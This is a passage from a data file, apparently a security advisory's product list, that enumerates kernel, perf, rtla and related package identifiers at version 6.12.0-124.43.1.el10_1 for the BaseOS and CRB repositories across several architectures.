"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
